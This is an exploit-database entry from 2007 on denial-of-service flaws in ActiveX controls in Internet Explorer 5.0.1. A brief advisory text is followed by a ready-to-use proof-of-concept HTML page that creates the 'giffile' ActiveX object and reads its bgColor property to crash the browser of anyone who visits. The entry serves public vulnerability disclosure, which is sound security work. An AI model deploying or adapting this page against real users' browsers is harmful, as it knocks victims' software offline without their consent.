Microsoft Internet Explorer 5.0.1 - Multiple ActiveX Controls Denial of Service Vulnerabilities

EDB-ID:

29536




Platform:

Windows

Date:

2007-01-29


source: https://www.securityfocus.com/bid/22288/info

Microsoft Internet Explorer is prone to multiple denial-of-service vulnerabilities because the application fails to handle exceptional conditions.

These issues are triggered when an attacker entices a victim user to visit a malicious website.

Remote attackers may exploit these issues to crash Internet Explorer, effectively denying service to legitimate users. 

<html>
<body>
  <script language="JavaScript">
    obj = new ActiveXObject("giffile");
    obj.bgColor;
  </script>
</body>
</html>